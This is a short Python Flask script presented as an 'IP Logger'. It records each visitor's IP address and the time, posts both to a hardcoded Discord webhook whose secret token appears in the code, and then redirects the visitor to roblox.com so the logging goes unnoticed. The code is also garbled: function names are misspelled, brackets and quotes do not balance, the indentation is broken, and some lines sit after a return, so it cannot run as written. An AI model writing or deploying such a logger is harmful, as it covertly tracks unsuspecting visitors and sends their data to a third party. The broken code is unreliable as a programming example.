from flask import Flask, request, rediect
from datetime import datetime
import requests


app = Flask(__name__)

def send_ip(ip, date):
 webhook_url = "https://discord.com/api/webhooks/1330072838538793021/Vu6GfpLtNDWwh5UtfzA-WgScJKhvNBPwvJx5YVmbv40hoF0voRvdKOMN2HoWmSUGQWZ6" 
data = {
    "content": ""
    "IP Logger"
}
  data ["embeds"] = [
    {"title": ip, "description": date}
    }
  ]
  request.post(webhook_url, json=data)
@app.route("/")
def index():
  ip = request.environ.get("HTTP_X_FORRWARDED_FOR" , request.remote.addr)
 date = datetime.today().shiftime("%Y-%m-%d %H:%M:%S")
  return "Hello World!""

send_ip(ip, date)
retuen redirect("https://roblox.com")

if __name__ =="__main__
app.run(host="0,0,0,0"
